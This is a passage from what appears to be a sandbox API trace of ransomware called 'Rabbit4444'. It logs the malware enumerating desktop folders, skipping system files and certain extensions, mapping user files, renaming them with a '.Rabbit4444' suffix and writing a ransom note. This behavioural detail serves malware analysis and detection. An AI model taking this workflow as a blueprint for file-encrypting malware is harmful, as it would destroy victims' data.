(lpString1=".png", lpString2=".dll") returned 1 [0050.163] lstrlenW (lpString=".lnk") returned 4 [0050.163] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0050.163] lstrlenW (lpString=".ini") returned 4 [0050.163] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0050.163] lstrlenW (lpString=".sys") returned 4 [0050.164] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0050.164] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\yCE8TOTz8j0hoj8IV.png" (normalized: "c:\\users\\fd1hvy\\desktop\\yce8totz8j0hoj8iv.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.164] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.164] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14147447026) returned 1 [0050.164] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=11403) returned 1 [0050.164] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0050.164] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101628 [0050.164] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2f90, lpName=0x0) returned 0x298 [0050.164] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2f90) returned 0x70000 [0050.165] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.165] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0050.165] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.165] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0050.165] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.165] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0050.165] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.165] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0050.165] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14147575821) returned 1 [0050.165] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0050.165] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101628 | out: hHeap=0xe0000) returned 1 [0050.165] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.165] CloseHandle (hObject=0x298) returned 1 [0050.165] CloseHandle (hObject=0x278) returned 1 [0050.166] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\yCE8TOTz8j0hoj8IV.png.Rabbit4444") returned 56 [0050.166] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\yCE8TOTz8j0hoj8IV.png" (normalized: "c:\\users\\fd1hvy\\desktop\\yce8totz8j0hoj8iv.png"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\yCE8TOTz8j0hoj8IV.png.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\yce8totz8j0hoj8iv.png.rabbit4444"), dwFlags=0x1) returned 1 [0050.166] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49766800, ftCreationTime.dwHighDateTime=0x1d4c96a, ftLastAccessTime.dwLowDateTime=0x2da94790, ftLastAccessTime.dwHighDateTime=0x1d4ce93, ftLastWriteTime.dwLowDateTime=0x2da94790, ftLastWriteTime.dwHighDateTime=0x1d4ce93, nFileSizeHigh=0x0, nFileSizeLow=0x5410, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZzG5k.m4a", cAlternateFileName="")) returned 1 [0050.166] lstrcmpiW (lpString1="ZzG5k.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.166] lstrcmpiW (lpString1="ZzG5k.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.166] lstrcmpiW (lpString1="ZzG5k.m4a", lpString2="Rabbit4444.exe") returned 1 [0050.166] lstrcmpiW (lpString1="ZzG5k.m4a", lpString2=".") returned 1 [0050.167] lstrcmpiW (lpString1="ZzG5k.m4a", lpString2="..") returned 1 [0050.167] lstrcmpiW (lpString1="ZzG5k.m4a", lpString2="windows") returned 1 [0050.167] lstrcmpiW (lpString1="ZzG5k.m4a", lpString2="bootmgr") returned 1 [0050.167] lstrcmpiW (lpString1="ZzG5k.m4a", lpString2="pagefile.sys") returned 1 [0050.167] lstrcmpiW (lpString1="ZzG5k.m4a", lpString2="boot") returned 1 [0050.167] lstrcmpiW (lpString1="ZzG5k.m4a", lpString2="ids.txt") returned 1 [0050.167] lstrcmpiW (lpString1="ZzG5k.m4a", lpString2="NTUSER.DAT") returned 1 [0050.167] lstrcpyW (in: lpString1=0x130eb68, lpString2="ZzG5k.m4a" | out: lpString1="ZzG5k.m4a") returned="ZzG5k.m4a" [0050.167] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ZzG5k.m4a", dwFileAttributes=0x0) returned 1 [0050.167] lstrlenW (lpString="ZzG5k.m4a") returned 9 [0050.167] lstrlenW (lpString="Rabbit4444") returned 10 [0050.167] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0050.167] lstrlenW (lpString=".dll") returned 4 [0050.167] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0050.167] lstrlenW (lpString=".lnk") returned 4 [0050.167] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0050.167] lstrlenW (lpString=".ini") returned 4 [0050.167] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0050.167] lstrlenW (lpString=".sys") returned 4 [0050.167] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0050.167] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ZzG5k.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\zzg5k.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.167] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.167] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14147816512) returned 1 [0050.167] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=21520) returned 1 [0050.168] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0050.168] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0050.168] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5710, lpName=0x0) returned 0x298 [0050.168] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5710) returned 0x70000 [0050.168] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.168] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0050.168] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.169] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0050.169] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.169] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0050.169] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.169] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0050.169] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14147964482) returned 1 [0050.169] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0050.169] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0050.169] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.169] CloseHandle (hObject=0x298) returned 1 [0050.169] CloseHandle (hObject=0x278) returned 1 [0050.170] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\ZzG5k.m4a.Rabbit4444") returned 44 [0050.170] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\ZzG5k.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\zzg5k.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\ZzG5k.m4a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\zzg5k.m4a.rabbit4444"), dwFlags=0x1) returned 1 [0050.170] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49766800, ftCreationTime.dwHighDateTime=0x1d4c96a, ftLastAccessTime.dwLowDateTime=0x2da94790, ftLastAccessTime.dwHighDateTime=0x1d4ce93, ftLastWriteTime.dwLowDateTime=0x2da94790, ftLastWriteTime.dwHighDateTime=0x1d4ce93, nFileSizeHigh=0x0, nFileSizeLow=0x5410, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZzG5k.m4a", cAlternateFileName="")) returned 0 [0050.170] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0050.171] lstrcpyW (in: lpString1=0x130eb68, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0050.171] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0050.172] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0050.173] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0050.174] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.174] CloseHandle (hObject=0x278) returned 1 [0050.174] CloseHandle (hObject=0x27c) returned 1 [0050.174] GetCurrentThreadId () returned 0xd98 [0050.174] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6350 [0050.174] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo") returned="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo" [0050.174] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10cd98 | out: hHeap=0xe0000) returned 1 [0050.174] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6348 | out: hHeap=0xe0000) returned 1 [0050.174] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo" | out: lpString1="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo") returned="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo" [0050.174] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\") returned="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\" [0050.174] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\.BFC0E91B00AE8A0620D3" [0050.174] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0050.178] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0050.180] FlushFileBuffers (hFile=0x27c) returned 1 [0050.183] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0050.183] CloseHandle (hObject=0x27c) returned 1 [0050.183] lstrlenW (lpString="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo") returned 36 [0050.183] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0050.183] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4eaf54d0, ftCreationTime.dwHighDateTime=0x1d4ca1e, ftLastAccessTime.dwLowDateTime=0x19129930, ftLastAccessTime.dwHighDateTime=0x1d4cace, ftLastWriteTime.dwLowDateTime=0xe73b6d38, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0050.183] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.184] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.184] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0050.184] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0050.184] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4eaf54d0, ftCreationTime.dwHighDateTime=0x1d4ca1e, ftLastAccessTime.dwLowDateTime=0x19129930, ftLastAccessTime.dwHighDateTime=0x1d4cace, ftLastWriteTime.dwLowDateTime=0xe73b6d38, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.184] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.184] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.184] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0050.184] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0050.184] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0050.184] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe73b6d38, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe73b6d38, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe73b6d38, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0050.184] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.184] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0050.184] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd60f3120, ftCreationTime.dwHighDateTime=0x1d4cefb, ftLastAccessTime.dwLowDateTime=0xb8a6b660, ftLastAccessTime.dwHighDateTime=0x1d4ccb4, ftLastWriteTime.dwLowDateTime=0xb8a6b660, ftLastWriteTime.dwHighDateTime=0x1d4ccb4, nFileSizeHigh=0x0, nFileSizeLow=0x14687, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B66_a.gif", cAlternateFileName="")) returned 1 [0050.184] lstrcmpiW (lpString1="B66_a.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.184] lstrcmpiW (lpString1="B66_a.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.184] lstrcmpiW (lpString1="B66_a.gif", lpString2="Rabbit4444.exe") returned -1 [0050.184] lstrcmpiW (lpString1="B66_a.gif", lpString2=".") returned 1 [0050.184] lstrcmpiW (lpString1="B66_a.gif", lpString2="..") returned 1 [0050.184] lstrcmpiW (lpString1="B66_a.gif", lpString2="windows") returned -1 [0050.184] lstrcmpiW (lpString1="B66_a.gif", lpString2="bootmgr") returned -1 [0050.184] lstrcmpiW (lpString1="B66_a.gif", lpString2="pagefile.sys") returned -1 [0050.184] lstrcmpiW (lpString1="B66_a.gif", lpString2="boot") returned -1 [0050.184] lstrcmpiW (lpString1="B66_a.gif", lpString2="ids.txt") returned -1 [0050.184] lstrcmpiW (lpString1="B66_a.gif", lpString2="NTUSER.DAT") returned -1 [0050.184] lstrcpyW (in: lpString1=0x130eb82, lpString2="B66_a.gif" | out: lpString1="B66_a.gif") returned="B66_a.gif" [0050.184] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\B66_a.gif", dwFileAttributes=0x0) returned 1 [0050.185] lstrlenW (lpString="B66_a.gif") returned 9 [0050.185] lstrlenW (lpString="Rabbit4444") returned 10 [0050.185] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0050.185] lstrlenW (lpString=".dll") returned 4 [0050.185] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0050.185] lstrlenW (lpString=".lnk") returned 4 [0050.185] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0050.185] lstrlenW (lpString=".ini") returned 4 [0050.185] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0050.185] lstrlenW (lpString=".sys") returned 4 [0050.185] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0050.185] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\B66_a.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\b66_a.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.185] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.185] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14149578161) returned 1 [0050.185] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=83591) returned 1 [0050.185] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0050.185] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0050.185] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14990, lpName=0x0) returned 0x298 [0050.185] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14990) returned 0x70000 [0050.188] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.188] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0050.188] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.188] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0050.188] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.188] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0050.188] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.188] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0050.188] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14149876522) returned 1 [0050.188] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0050.188] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0050.188] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.189] CloseHandle (hObject=0x298) returned 1 [0050.189] CloseHandle (hObject=0x278) returned 1 [0050.190] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\B66_a.gif.Rabbit4444") returned 57 [0050.190] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\B66_a.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\b66_a.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\B66_a.gif.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\b66_a.gif.rabbit4444"), dwFlags=0x1) returned 1 [0050.190] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x404bb800, ftCreationTime.dwHighDateTime=0x1d4cedf, ftLastAccessTime.dwLowDateTime=0xc6750e10, ftLastAccessTime.dwHighDateTime=0x1d4d225, ftLastWriteTime.dwLowDateTime=0xc6750e10, ftLastWriteTime.dwHighDateTime=0x1d4d225, nFileSizeHigh=0x0, nFileSizeLow=0x11338, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BZhPxLldD zvXbBb.bmp", cAlternateFileName="BZHPXL~1.BMP")) returned 1 [0050.190] lstrcmpiW (lpString1="BZhPxLldD zvXbBb.bmp", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.190] lstrcmpiW (lpString1="BZhPxLldD zvXbBb.bmp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.190] lstrcmpiW (lpString1="BZhPxLldD zvXbBb.bmp", lpString2="Rabbit4444.exe") returned -1 [0050.190] lstrcmpiW (lpString1="BZhPxLldD zvXbBb.bmp", lpString2=".") returned 1 [0050.190] lstrcmpiW (lpString1="BZhPxLldD zvXbBb.bmp", lpString2="..") returned 1 [0050.190] lstrcmpiW (lpString1="BZhPxLldD zvXbBb.bmp", lpString2="windows") returned -1 [0050.190] lstrcmpiW (lpString1="BZhPxLldD zvXbBb.bmp", lpString2="bootmgr") returned 1 [0050.190] lstrcmpiW (lpString1="BZhPxLldD zvXbBb.bmp", lpString2="pagefile.sys") returned -1 [0050.190] lstrcmpiW (lpString1="BZhPxLldD zvXbBb.bmp", lpString2="boot") returned 1 [0050.190] lstrcmpiW (lpString1="BZhPxLldD zvXbBb.bmp", lpString2="ids.txt") returned -1 [0050.190] lstrcmpiW (lpString1="BZhPxLldD zvXbBb.bmp", lpString2="NTUSER.DAT") returned -1 [0050.190] lstrcpyW (in: lpString1=0x130eb82, lpString2="BZhPxLldD zvXbBb.bmp" | out: lpString1="BZhPxLldD zvXbBb.bmp") returned="BZhPxLldD zvXbBb.bmp" [0050.190] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\BZhPxLldD zvXbBb.bmp", dwFileAttributes=0x0) returned 1 [0050.191] lstrlenW (lpString="BZhPxLldD zvXbBb.bmp") returned 20 [0050.191] lstrlenW (lpString="Rabbit4444") returned 10 [0050.191] lstrcmpiW (lpString1="zvXbBb.bmp", lpString2="Rabbit4444") returned 1 [0050.191] lstrlenW (lpString=".dll") returned 4 [0050.191] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0050.191] lstrlenW (lpString=".lnk") returned 4 [0050.191] lstrcmpiW (lpString1=".bmp", lpString2=".lnk") returned -1 [0050.191] lstrlenW (lpString=".ini") returned 4 [0050.191] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0050.191] lstrlenW (lpString=".sys") returned 4 [0050.191] lstrcmpiW (lpString1=".bmp", lpString2=".sys") returned -1 [0050.191] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\BZhPxLldD zvXbBb.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\bzhpxlldd zvxbbb.bmp"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.191] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.191] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14150179507) returned 1 [0050.191] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=70456) returned 1 [0050.191] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0050.191] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0050.191] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11640, lpName=0x0) returned 0x298 [0050.191] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11640) returned 0x70000 [0050.193] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.193] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0050.193] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.193] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0050.193] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.193] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0050.193] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.193] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, 